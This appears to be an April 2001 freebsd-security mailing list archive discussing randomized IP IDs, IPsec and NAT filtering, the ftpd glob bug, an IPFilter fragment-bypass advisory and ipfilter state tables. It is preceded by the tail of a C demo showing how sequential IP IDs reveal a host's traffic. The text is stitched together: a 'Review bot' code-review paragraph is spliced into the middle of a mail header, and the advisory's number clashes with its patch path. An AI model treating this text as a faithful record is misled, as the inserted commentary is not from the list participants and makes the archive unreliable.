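 * n_between packets to other peers, probe again (ID b).  With the counter,
 * b - a - 1 is exactly n_between; with the permutation the difference says
 * nothing about the gap.
 */
int infer_from_counter(int n_between)
{
    uint16_t a = ip_seqid(), b;
    int i;
    for (i = 0; i < n_between; i++) (void)ip_seqid();
    b = ip_seqid();
    return (int)(uint16_t)(b - a) - 1;
}

int infer_from_random(uint32_t seed, int n_between)
{
    struct ipid_state st;
    uint16_t a, b;
    int i;
    ipid_init(&st, seed);
    a = ip_randomid(&st);
    for (i = 0; i < n_between; i++) (void)ip_randomid(&st);
    b = ip_randomid(&st);
    return (int)(uint16_t)(b - a) - 1;
}

int main(void)
{
    printf("counter: observer infers %d packets sent between probes (true: 7)\n",
           infer_from_counter(7));
    printf("random : observer infers %d (true: 7; the value is noise)\n",
           infer_from_random(12345u, 7));
    printf("distinct IDs in 65536 outputs: %d, after byte swap: %d\n",
           ipid_distinct(12345u, 0), ipid_distinct(12345u, 1));
    return 0;
}
```

The uniqueness check is the one worth keeping when evaluating any real replacement generator: run it for the cycle length the design claims and confirm the count equals the window, with and without the byte swap.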
From: Kris Kennaway To: Wes Peters Cc: Kris Kennaway , freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG, provos@OpenBSD.org Subject: Re: non-random IP IDs Message-ID: <20010416121019.D10023@xor.obsecurity.org> References: <001f01c0c30b$805b0840$d2e2fdce@netrex.com> <20010416020311.A1292@xor.obsecurity.org> <3ADB0389.5D236D88@softweyr.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="zbGR4y+acU1DwHSi" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3ADB0389.5D236D88@softweyr.com>; from wes@softweyr.com on Mon, Apr 16, 2001 at 08:36:57AM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --zbGR4y+acU1DwHSi Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Mon, Apr 16, 2001 at 08:36:57AM -0600, Wes Peters wrote: > Looks clean. The only comment I can find is: Why not have ip_randomid() > return the ID in network byte order? It would save several HTONS macros > trailing the ip_randomid() calls. I can't think of anything off the top of my head, but there was some reason why OpenBSD made this change: diff -u -r1.12 -r1.13 --- ip_mroute.c 1999/01/08 01:04:17 1.12 +++ ip_mroute.c 1999/01/08 21:51:22 1.13 
@@ -1397,7 +1397,8 @@ */ ip_copy = mtod(mb_copy, struct ip *); *ip_copy = multicast_encap_iphdr; - ip_copy->ip_id = htons(ip_randomid()); + ip_copy->ip_id = ip_randomid(); + HTONS(ip_copy->ip_id); ip_copy->ip_len = len; ip_copy->ip_src = vifp->v_lcl_addr; ip_copy->ip_dst = vifp->v_rmt_addr; Presumably there was some reasoning there. Niels, can you shed any light? Kris --zbGR4y+acU1DwHSi Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE620ObWry0BWjoQKURAuUHAKCdHQSfWDRrszsnqghfWJ7GduljdwCgrCzh VXHsMlwwU2Z8rsVXQhbiVlo= =beZj -----END PGP SIGNATURE----- --zbGR4y+acU1DwHSi-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 12:16: 7 2001 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 2D72237B43C for ; Mon, 16 Apr 2001 12:16:02 -0700 (PDT) (envelope-from Cy.Schubert@uumail.gov.bc.ca) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id MAA31026; Mon, 16 Apr 2001 12:15:35 -0700 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda31024; Mon Apr 16 12:15:23 2001 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.11.2/8.9.1) id f3GJFIa06170; Mon, 16 Apr 2001 12:15:18 -0700 (PDT) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdRn6161; Mon Apr 16 12:14:23 2001 Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.3/8.9.1) id f3GJEMh06453; Mon, 16 Apr 2001 12:14:22 -0700 (PDT) Message-Id: <200104161914.f3GJEMh06453@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdav6448; Mon Apr 16 12:14:05 2001 X-Mailer: exmh 
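Review bot: the hunk replaces `ip_copy->ip_id = htons(ip_randomid());` with a plain assignment followed by `HTONS(ip_copy->ip_id);` but records no reason; if ip_randomid() returns a u_int16_t the two forms leave identical bytes in ip_id, so the commit should state the motivation (matching whatever in-place macro convention the surrounding code uses for header fields, or a concern about htons() on some platform) or the change is churn and should be dropped. It is also worth confirming in review that ip_randomid() is declared to return u_int16_t rather than a wider type, which is the width question raised later in this thread.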
version 2.3.1 01/18/2001 with nmh-1.0.4 Reply-To: Cy Schubert - ITSD Open Systems Group 
From: Cy Schubert - ITSD Open Systems Group X-Sender: schubert To: Brian Candler Cc: Lowell Gilbert , Rasputin , freebsd-security@FreeBSD.ORG Subject: Re: Interaction between ipfw, IPSEC and natd In-reply-to: Your message of "Mon, 16 Apr 2001 11:23:58 BST." <20010416112358.A13561@linnet.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Mon, 16 Apr 2001 12:14:05 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

In message <20010416112358.A13561@linnet.org>, Brian Candler writes:
> > Some forms of IPSEC have fundamental problems with packet rewriting,
> > which means that NAT is extremely hard to use in an IPSEC environment.
> > Notably, end-to-end IPSEC modes are broken, although router-based
> > tunnels can be a problem depending on whether the NAT rewriting occurs
> > before or after the IPSEC headers are applied.
> >
> > Even without NAT, though, firewalls are a little tricky to configure
> > for IPSEC packets. This is because the firewall can't see the
> > protocol ports (or even the protocol, for that matter) in the packet,
>
> Ah, it seems I wasn't clear :-) It's actually a very simple scenario, and I
> do not need IPSEC packets to be routed through the firewall at all. There
> are cleartext sessions which need NAT to be able to browse the outside
> Internet, and then cleartext packets which are IPSEC-tunnelled from one
> private network to another, like this:
>
>      Internet                            Internet
>         ^   . . . . . . . . . . . . . .    ^
>         |  ,        IPSEC tunnel        `  |
>    +----------+                      +----------+
>    | Firewall |                      | Firewall |
>    +----------+                      +----------+
>         |                                 |
>      ---+---                           ---+---
>      Office1                           Office2
>    10.0.1.0/24                       10.0.2.0/24
>
> Now, I have done a bit of experimentation and found the following.
>
> 1. Packets which are diverted to natd are reinjected into the ipfw ruleset
> at the following rule (actually 'man 8 natd' does say this). The packets
> do retain their 'in via ' tag. 'man 4 divert' documents the
> mechanism which makes this possible.
>
> 2. Incoming IPSEC packets pass _twice_ through the ipfw rules: once in
> their encapsulated form (protocol 50), and when decrypted they pass
> through the whole ruleset again, retaining their 'in via ' tag.
>
> The second rule makes things a bit of a mess. For starters, you need two
> rules to permit IPSEC traffic through, one in encrypted and one in decrypted
> form:
>
> add 1000 allow esp from to in via fxp0
> add 1010 allow ip from 10.0.1.0/24 to 10.0.2.0/24 in via fxp0
>
> Now, it seems ipfw cannot tell the difference between a packet which came
> 'in via fxp0' in the clear, or 'in via fxp0' as IPSEC which was successfully
> decrypted and authenticated.
>
> It is not clear what happens if someone spoofs a packet with a 10.0.x source
> and dest address and injects it into the outside interface of the firewall;
> hopefully the IPSEC policy (/require) catches this case and drops the
> packet, but I would feel much happier with an explicit ipfw antispoofing
> rule.

I've noticed this with IP Filter as well. For applications where this is a critical issue, I use the pipsecd port, allowing me to filter on the external interface (xl0, fxp0, etc.), e.g. AH and ESP, and on the tun(4) interface that pipsecd is attached to, e.g. TCP, UDP, ICMP.

I realise that this was discussed on this list within the past 6 months and that one of the KAME developers (KAME is obviously IPv6 focused) indicated that IPv6 addressing would not allow for IPSec packets being filtered on an interface because IPv6 addresses span all interfaces. (I realise I'm not quoting this exactly, or may have even got the quote completely wrong; however, that's what it boils down to for IPv4 users trying to use KAME IPSec.)

As far as solutions go, I don't have one, other than to continue to use pipsecd for situations that need this kind of filtering.
Just sort of thinking out loud here, would some kind of daemon (or other facility), that would attach itself to a tun(4) (or other) interface, like pipsecd does, but use the kernel's IPSec facility to encrypt and encapsulate the packets instead of its own, then inject them into the external interface be of use? Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/Alpha Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 12:27:35 2001 Delivered-To: freebsd-security@freebsd.org Received: from a.mx.everquick.net (a.mx.everquick.net [216.89.137.3]) by hub.freebsd.org (Postfix) with ESMTP id D75CD37B422; Mon, 16 Apr 2001 12:27:28 -0700 (PDT) (envelope-from eddy+public+spam@noc.everquick.net) Received: from localhost (eddy@localhost) by a.mx.everquick.net (8.10.2/8.10.2) with ESMTP id f3GJO8u26443; Mon, 16 Apr 2001 19:24:08 GMT X-EverQuick-No-Abuse: Report any e-mail abuse to Date: Mon, 16 Apr 2001 19:24:07 +0000 (GMT) From: "E.B. Dreger" To: Kris Kennaway Cc: Wes Peters , freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG, provos@OpenBSD.org Subject: Re: non-random IP IDs In-Reply-To: <20010416121019.D10023@xor.obsecurity.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Date: Mon, 16 Apr 2001 12:10:19 -0700 
> From: Kris Kennaway > > I can't think of anything off the top of my head, but there was some > reason why OpenBSD made this change: > > - ip_copy->ip_id = htons(ip_randomid()); > + ip_copy->ip_id = ip_randomid(); > + HTONS(ip_copy->ip_id); > > Presumably there was some reasoning there. Niels, can you shed any > light? Without having the source in front of me, what length of value does ip_randomid() return? htons(long) != htons(short) perhaps? Eddy --------------------------------------------------------------------------- Brotsman & Dreger, Inc. EverQuick Internet / EternalCommerce Division Phone: (316) 794-8922 --------------------------------------------------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 16 12:35:51 2001 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 450AF37B42C for ; Mon, 16 Apr 2001 12:35:47 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id PAA98984; Mon, 16 Apr 2001 15:34:33 -0400 (EDT) (envelope-from wollman) Date: Mon, 16 Apr 2001 15:34:33 -0400 (EDT) 
From: Garrett Wollman
Message-Id: <200104161934.PAA98984@khavrinen.lcs.mit.edu>
To: Cy Schubert - ITSD Open Systems Group
Cc: Igor Roshchin, security@FreeBSD.ORG
Subject: Re: Wu-ftpd and Remote BSD ftpd glob exploit
In-Reply-To: <200104161846.f3GIkL206263@cwsys.cwsent.com>
References: <200104161516.LAA70850@giganda.komkon.org> <200104161846.f3GIkL206263@cwsys.cwsent.com>

< said:
> Any application, local or remote, that uses the FreeBSD glob(3)
> function would have been vulnerable prior to the correction date.

wu-ftpd is not one. It has its own (4.3BSD-based) glob implementation. (I won't speak for whether it is vulnerable to analogous bugs.)

-GAWollman

From owner-freebsd-security Mon Apr 16 12:37:33 2001
Date: Mon, 16 Apr 2001 12:37:22 -0700 (PDT)
Message-Id: <200104161937.f3GJbMb51244@freefall.freebsd.org>
From: FreeBSD Security Advisories
To: FreeBSD Security Advisories
Subject: FreeBSD Security Advisory FreeBSD-SA-01:32.ipfilter
Reply-To: security-advisories@FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----

=============================================================================
FreeBSD-SA-01:32                                            Security Advisory
                                                                FreeBSD, Inc.

Topic:          IPFilter may incorrectly pass packets

Category:       core
Module:         IPFilter
Announced:      2001-04-16
Credits:        Thomas Lopatic
Affects:        FreeBSD 3.x (all releases), FreeBSD 4.x (all releases),
                FreeBSD 3.5-STABLE, and 4.2-STABLE prior to the correction
                date.
Corrected:      2001-04-07 (FreeBSD 4.2-STABLE)
Vendor status:  Corrected
FreeBSD only:   NO

I.   Background

IPFilter is a multi-platform packet filtering package.

II.  Problem Description

When matching a packet fragment, insufficient checks were performed to ensure the fragment is valid. In addition, the fragment cache is checked before any rules are checked. Even if all fragments are blocked with a rule, fragment cache entries can be created by packets that match currently held state information. Because of these discrepancies, certain packets may bypass filtering rules.

All versions of FreeBSD prior to the correction date, including FreeBSD 3.5.1 and 4.2, contain this problem. The base system that will ship with FreeBSD 4.3 does not contain this problem since it was corrected during the beta cycle before the release.

III. Impact

Malicious remote users may be able to bypass filtering rules, allowing them to potentially circumvent the firewall.

IPFilter is not enabled by default. If you have not enabled IPFilter, your system is not vulnerable to this problem.

IV.  Workaround

Since fragment cache matching occurs before filtering rules checking, it is not possible to work around this problem using IPFilter rules.

V.   Solution

[FreeBSD 3.x]

Due to the age of the IPFilter package shipped with FreeBSD 3.x, it is recommended that FreeBSD 3.x systems update to IPFilter 3.4.17 using the package available from the author's website:

http://coombs.anu.edu.au/~avalon/ip-filter.html

[FreeBSD 4.x]

One of the following:

1) Upgrade to FreeBSD 4.2-STABLE after the correction date.

2) Download the patch and detached PGP signature from the following location:

The following patch applies to FreeBSD 4.1-RELEASE through 4.2-STABLE.

# fetch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:33/ipfilter.patch
# fetch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:33/ipfilter.patch.asc

Verify the detached signature using your PGP utility.

Issue the following commands as root:

# cd /usr/src
# patch -p < /path/to/patch

If the system is using ipfilter as a kernel module, the module may be rebuilt and installed and ipfilter rules reloaded with the following commands:

# cd /usr/src/sys/modules/ipfilter
# make all install
# kldunload ipl && kldload ipf && ipf -Fa -f /etc/ipf.rules

Otherwise, if ipfilter is compiled into the kernel, a new kernel will need to be compiled and installed and the system will have to be rebooted for the changes to take effect.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org

iQCVAwUBOttI71UuHi5z0oilAQHKwwP8CfuhsJA8z78zOJCLSGWPAJSgsi9aFvP7
oVd4eKkVHgHI5hC5QTRgOGg84KncXUu7DJjlOlZ+6nVxcxdp4DED/yRTWjqc14og
guP3SBAcJwH5y44ZW/VV+LlbNJue77Igkq1u3dran6TPBMdiUeRIRsj0acn6k1nc
ATwy7N0Ade8=
=Wujh
-----END PGP SIGNATURE-----

From owner-freebsd-security Mon Apr 16 12:41:40 2001
Date: Mon, 16 Apr 2001 12:41:31 -0700
From: Kris Kennaway
To: "H. Wade Minter"
Cc: security@FreeBSD.ORG
Subject: Re: Rebuilding FTPD
Message-ID: <20010416124130.A11148@xor.obsecurity.org>
In-Reply-To: from minter@lunenburg.org on Mon, Apr 16, 2001 at 11:40:31AM -0400

On Mon, Apr 16, 2001 at 11:40:31AM -0400, H. Wade Minter wrote:
> What's the procedure for rebuilding ftpd after a cvsup to fix the globbing
> bug? I tried "cd /usr/src/libexec/ftpd && make install", but that didn't
> work. I'm running 4-STABLE.

We're planning to release the advisory tomorrow, which will explain all. It would have gone out today, but someone pointed out that there may be a remaining change needed, which jedgar is going to look at tonight.

Kris

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE620rqWry0BWjoQKURApRfAKC8FgtvJsk3SfVSGVTYfs7EjSCTUACghbpP
6jMQf9Cs/lcbzcY77T5F8MA=
=GjVC
-----END PGP SIGNATURE-----

From owner-freebsd-security Mon Apr 16 12:45:19 2001
Date: Mon, 16 Apr 2001 15:42:49 -0400
From: Barney Wolff
To: "E.B. Dreger"
Cc: Kris Kennaway, Wes Peters, freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG, provos@OpenBSD.org
Subject: Re: non-random IP IDs
Message-ID: <20010416154249.A49858@mx.databus.com>
References: <20010416121019.D10023@xor.obsecurity.org>
In-Reply-To: from eddy+public+spam@noc.everquick.net on Mon, Apr 16, 2001 at 07:24:07PM +0000

If ip_randomid() is an asm rather than C code, I have sometimes seen problems with an asm func calling another asm func. That was long ago and far away, but is the only reason I can think of for that change.

But whether the id is random or a counter, there is no reason to htons it, as long as it's treated consistently, with externals never compared with internals.

Barney Wolff

> > Date: Mon, 16 Apr 2001 12:10:19 -0700
> > From: Kris Kennaway
> >
> > I can't think of anything off the top of my head, but there was some
> > reason why OpenBSD made this change:
> >
> > - ip_copy->ip_id = htons(ip_randomid());
> > + ip_copy->ip_id = ip_randomid();
> > + HTONS(ip_copy->ip_id);
> >
> > Presumably there was some reasoning there. Niels, can you shed any
> > light?

From owner-freebsd-security Mon Apr 16 12:50:59 2001
Date: Mon, 16 Apr 2001 12:50:53 -0700
From: Kris Kennaway
To: Barney Wolff
Cc: "E.B. Dreger", Kris Kennaway, Wes Peters, freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG, provos@OpenBSD.org
Subject: Re: non-random IP IDs
Message-ID: <20010416125053.A11446@xor.obsecurity.org>
References: <20010416121019.D10023@xor.obsecurity.org> <20010416154249.A49858@mx.databus.com>
In-Reply-To: <20010416154249.A49858@mx.databus.com>; from barney@databus.com on Mon, Apr 16, 2001 at 03:42:49PM -0400

On Mon, Apr 16, 2001 at 03:42:49PM -0400, Barney Wolff wrote:
> If ip_randomid() is an asm rather than C code, I have sometimes
> seen problems with an asm func calling another asm func. That
> was long ago and far away, but is the only reason I can think of
> for that change.
>
> But whether the id is random or a counter, there is no reason to
> htons it, as long as it's treated consistently, with externals
> never compared with internals.

Surely that can't work since the purpose of that field is for received packet ordering (unless I'm wrong, I'm not an IPv4 guru and only skimmed the RFC), and what's ordered in network order isn't ordered in host order.

Kris

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE6200cWry0BWjoQKURAtq2AJ0X7Nt1XcCFlr9OOcWdfNtY843/kQCdEfDR
8PfVfL5oMqwnxDN9VD0TJGk=
=9ZPJ
-----END PGP SIGNATURE-----

From owner-freebsd-security Mon Apr 16 12:57:05 2001
Message-Id: <200104161955.f3GJtQ506951@cwsys.cwsent.com>
Reply-To: Cy Schubert - ITSD Open Systems Group
From: Cy Schubert - ITSD Open Systems Group
To: Roman Shterenzon
Cc: Alfred Perlstein, security@FreeBSD.ORG
Subject: Re: 4.3rc2: if=/etc/issue in /etc/gettytab is not respected
In-reply-to: Your message of "Mon, 16 Apr 2001 18:26:28 +0300."
Date: Mon, 16 Apr 2001 12:54:53 -0700

I don't see what the problem is. It works for me. I verified that I am using the telnetd from src/crypto not src/libexec by comparing stripped copies of telnetd in src/crypto and src/libexec with what was installed. The src/crypto version was the one that was installed.

I'm using,

FreeBSD cwsys 4.3-RC FreeBSD 4.3-RC #0: Sun Apr 15 08:23:59 PDT 2001 root@:/opt/cvs-430b/src/sys/compile/CWSYS i386

Regards,                       Phone:  (250)387-8437
Cy Schubert                    Fax:    (250)387-5766
Team Leader, Sun/Alpha Team    Internet:  Cy.Schubert@osg.gov.bc.ca
Open Systems Group, ITSD, ISTA
Province of BC

In message , Roman Shterenzon writes:
>
> So I guess the RELEASE will be made with this bug :(
>
> On Tue, 3 Apr 2001, Alfred Perlstein wrote:
>
> > * Roman Shterenzon [010403 15:35] wrote:
> > > With enough attention and code analysis, that could be made before
> > > 4.3-RELEASE. There's almost two weeks left, and many people who are
> > > willing to test it. Me for example :)
> >
> > There's basically two telnetd's in the source tree. When you
> > compile and install the one from src/secure/libexec/telnetd you
> > get one that doesn't respect the if= directive. It looks like
> > it doesn't even respect the other settings, something to do
> > with the USER environment variable.
> >
> > I've moved this to the security list in an effort to get this
> > explained.
> >
> > Anyone know why this is going on?
> >
> > Basically in "normal" (src/libexec/telnetd.c)
> > this:
> > if (getenv("USER"))
> > hostinfo = 0;
> > is false, but under "crypto" (src/crypto/telnet/telnetd/telnetd.c)
> > it's true and therefore doesn't display the login info.
> >
> > --
> > -Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org]
> > Instead of asking why a piece of software is using "1970s technology,"
> > start asking why software is ignoring 30 years of accumulated wisdom.
>
> --Roman Shterenzon, UNIX System Administrator and Consultant
> [ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ]

From owner-freebsd-security Mon Apr 16 12:57:41 2001
Date: Mon, 16 Apr 2001 15:57:57 -0400 (EDT)
From: Rob Simmons
Subject: ipfilter state tables

-----BEGIN PGP SIGNED MESSAGE-----
Hash: RIPEMD160

The total number of states that ipfilter can keep is governed by these two constants in src/sys/netinet/ip_state.h and /usr/src/contrib/ipfilter/ip_state.h:

IPSTATE_SIZE
IPSTATE_MAX

They are set to 5737, and 4013 which is ok for average use, but causes problems for higher traffic firewalls. Could these two have a kernel config file knob? This would make life easier :)

Robert Simmons
Systems Administrator
http://www.wlcg.com/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE6207Jv8Bofna59hYRA+7JAJ0dO+b+YmGlyJ9Gk2VgcTvi/R2ljgCfa6re
wg6WWa/swdM1JTCSC2XZyIw=
=idMY
-----END PGP SIGNATURE-----

From owner-freebsd-security Mon Apr 16 12:59:48 2001
From: Darren Reed
Message-Id: <200104161958.FAA08797@caligula.anu.edu.au>
Subject: Re: non-random IP IDs
To: kris@obsecurity.org (Kris Kennaway)
Date: Tue, 17 Apr 2001 05:58:22 +1000 (Australia/ACT)
Cc: barney@databus.com (Barney Wolff), eddy+public+spam@noc.everquick.net (E.B. Dreger), kris@obsecurity.org (Kris Kennaway), wes@softweyr.com (Wes Peters), freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG, provos@OpenBSD.org
In-Reply-To: <20010416125053.A11446@xor.obsecurity.org> from "Kris Kennaway" at Apr 16, 2001 12:50:53 PM

In some mail from Kris Kennaway, sie said:
>
> Surely that can't work since the purpose of that field is for received
> packet ordering (unless I'm wrong, I'm not an IPv4 guru and only
> skimmed the RFC), and what's ordered in network order isn't ordered in
> host order.

It is not used by the receiver for packet ordering, only for collection of fragments (of a larger packet).

Darren

From owner-freebsd-security Mon Apr 16 13:01:49 2001
Date: Mon, 16 Apr 2001 16:01:32 -0400
From: Barney Wolff
To: Kris Kennaway
Cc: Barney Wolff, "E.B. Dreger", Wes Peters, freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG, provos@OpenBSD.org
Subject: Re: non-random IP IDs
Message-ID: <20010416160132.A49963@mx.databus.com>
References: <20010416121019.D10023@xor.obsecurity.org> <20010416154249.A49858@mx.databus.com> <20010416125053.A11446@xor.obsecurity.org>
In-Reply-To: <20010416125053.A11446@xor.obsecurity.org>; from kris@obsecurity.org on Mon, Apr 16, 2001 at 12:50:53PM -0700

No - the ip_id is used only to collect the fragments of a single packet - so all that counts is that each fragment has the same value, and that the value not collide with that in other packets/fragments that can be in flight at the same time. (I think you're confusing ip_id with the TCP sequence number.)

Barney

On Mon, Apr 16, 2001 at 12:50:53PM -0700, Kris Kennaway wrote:
> On Mon, Apr 16, 2001 at 03:42:49PM -0400, Barney Wolff wrote:
> > If ip_randomid() is an asm rather than C code, I have sometimes
> > seen problems with an asm func calling another asm func. That
> > was long ago and far away, but is the only reason I can think of
> > for that change.
> >
> > But whether the id is random or a counter, there is no reason to
> > htons it, as long as it's treated consistently, with externals
> > never compared with internals.
>
> Surely that can't work since the purpose of that field is for received
> packet ordering (unless I'm wrong, I'm not an IPv4 guru and only
> skimmed the RFC), and what's ordered in network order isn't ordered in
> host order.
>
> Kris

From owner-freebsd-security Mon Apr 16 13:03:07 2001
From: Darren Reed
Message-Id: <200104162002.GAA09062@caligula.anu.edu.au>
Subject: Re: non-random IP IDs
To: kris@obsecurity.org (Kris Kennaway)
Date: Tue, 17 Apr 2001 06:02:42 +1000 (Australia/ACT)
Cc: avalon@coombs.anu.edu.au (Darren Reed), kris@obsecurity.org (Kris Kennaway), silby@silby.com (Mike Silbersack), newsletter@marktroberts.com (Mark T Roberts), freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG
In-Reply-To: <20010416120630.C10023@xor.obsecurity.org> from "Kris Kennaway" at Apr 16, 2001 12:06:30 PM

In some mail from Kris Kennaway, sie said:
>
> On Tue, Apr 17, 2001 at 04:36:15AM +1000, Darren Reed wrote:
> > You should optimize it for mod being 2^n-1 (or make that a requirement).
>
> I'm afraid I don't have time to look at this right now. Perhaps it
> can be revisited (the sysctl defaults to off for now), or Niels Provos
> may be interested in the idea.

Basically it means '% mod' -> '& mod' and call it with a 2^n-1 number.

> > Also, drop the HTONS statements, they no longer make sense. Before ip_id
> > was a counter and so it made sense (sorta) to change its byte ordering to
> > network. Now it's just a random number so there is no longer any need.
>
> Well, it still has wrapping properties like a network-order counter,
> i.e. the algorithm attempts to order the output so that it doesn't
> wrap within the segment lifetime. That would be lost without using
> HTONS.

You're confusing properties of the local number and some opaque bits in a packet being sent over the 'net.

Darren

From owner-freebsd-security Mon Apr 16 13:04:35 2001
Date: Mon, 16 Apr 2001 13:04:28 -0700
From: Kris Kennaway
To: Darren Reed
Cc: Kris Kennaway, Barney Wolff, "E.B. Dreger", Wes Peters, freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG, provos@OpenBSD.org
Subject: Re: non-random IP IDs
Message-ID: <20010416130428.A11906@xor.obsecurity.org>
References: <20010416125053.A11446@xor.obsecurity.org> <200104161958.FAA08797@caligula.anu.edu.au>
In-Reply-To: <200104161958.FAA08797@caligula.anu.edu.au>; from avalon@coombs.anu.edu.au on Tue, Apr 17, 2001 at 05:58:22AM +1000

On Tue, Apr 17, 2001 at 05:58:22AM +1000, Darren Reed wrote:
> In some mail from Kris Kennaway, sie said:
> >
> > Surely that can't work since the purpose of that field is for received
> > packet ordering (unless I'm wrong, I'm not an IPv4 guru and only
> > skimmed the RFC), and what's ordered in network order isn't ordered in
> > host order.
>
> It is not used by the receiver for packet ordering, only for collection
> of fragments (of a larger packet).

Okay, I'll have to read the RFC again more closely.

Kris

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE621BMWry0BWjoQKURAuD0AJ9HRjVa5c1gEl3KV6omdVeq/GA4EgCgwYG3
kqvhG2YMHV7SFoAmq8OdRaU=
=QjdL
-----END PGP SIGNATURE-----

From owner-freebsd-security Mon Apr 16 13:08:22 2001
Date: Mon, 16 Apr 2001 13:08:14 -0700
From: Kris Kennaway
To: Darren Reed
Cc: Kris Kennaway, Mike Silbersack, Mark T Roberts, freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG
Subject: Re: non-random IP IDs
Message-ID: <20010416130814.A12057@xor.obsecurity.org>
References: <20010416120630.C10023@xor.obsecurity.org> <200104162002.GAA09062@caligula.anu.edu.au>
In-Reply-To: <200104162002.GAA09062@caligula.anu.edu.au>; from avalon@coombs.anu.edu.au on Tue, Apr 17, 2001 at 06:02:42AM +1000

On Tue, Apr 17, 2001 at 06:02:42AM +1000, Darren Reed wrote:
> > > You should optimize it for mod being 2^n-1 (or make that a requirement).
> >
> > I'm afraid I don't have time to look at this right now. Perhaps it
> > can be revisited (the sysctl defaults to off for now), or Niels Provos
> > may be interested in the idea.
>
> Basically it means '% mod' -> '& mod' and call it with a 2^n-1 number.

Oh, okay.

> > Well, it still has wrapping properties like a network-order counter,
> > i.e. the algorithm attempts to order the output so that it doesn't
> > wrap within the segment lifetime. That would be lost without using
> > HTONS.
>
> You're confusing properties of the local number and some opaque bits in
> a packet being sent over the 'net.

Quite likely.

Kris

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE621EuWry0BWjoQKURApyyAKCBB7Zt5a4iTdLd/p5UfsjwffMpBwCfScng
oR2Ef5UAJZl7DV94q312HM0=
=hVp+
-----END PGP SIGNATURE-----

From owner-freebsd-security Mon Apr 16 13:09:52 2001
From: Darren Reed
Message-Id: <200104162009.GAA09445@caligula.anu.edu.au>
Subject: Re: ipfilter state tables
To: rsimmons@wlcg.com (Rob Simmons)
Date: Tue, 17 Apr 2001 06:09:40 +1000 (Australia/ACT)
Cc: freebsd-security@FreeBSD.ORG
In-Reply-To: from "Rob Simmons" at Apr 16, 2001 03:57:57 PM

In some mail from Rob Simmons, sie said:
>
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: RIPEMD160
>
> The total number of states that ipfilter can keep is governed by these
> two constants in src/sys/netinet/ip_state.h and
> /usr/src/contrib/ipfilter/ip_state.h:
> IPSTATE_SIZE
> IPSTATE_MAX
>
> They are set to 5737, and 4013 which is ok for average use, but causes
> problems for higher traffic firewalls. Could these two have a kernel
> config file knob? This would make life easier :)

I'll think about it. It would require something like this, however:

ipf -D
sysctl -s net.inet.ipf.fr_statesize=123456
ipf -E -f /etc/ipf.conf

- you couldn't change the state table size while IPFilter was enabled.

Darren

From owner-freebsd-security Mon Apr 16 13:10:16 2001
Date: Mon, 16 Apr 2001 21:09:50 +0100
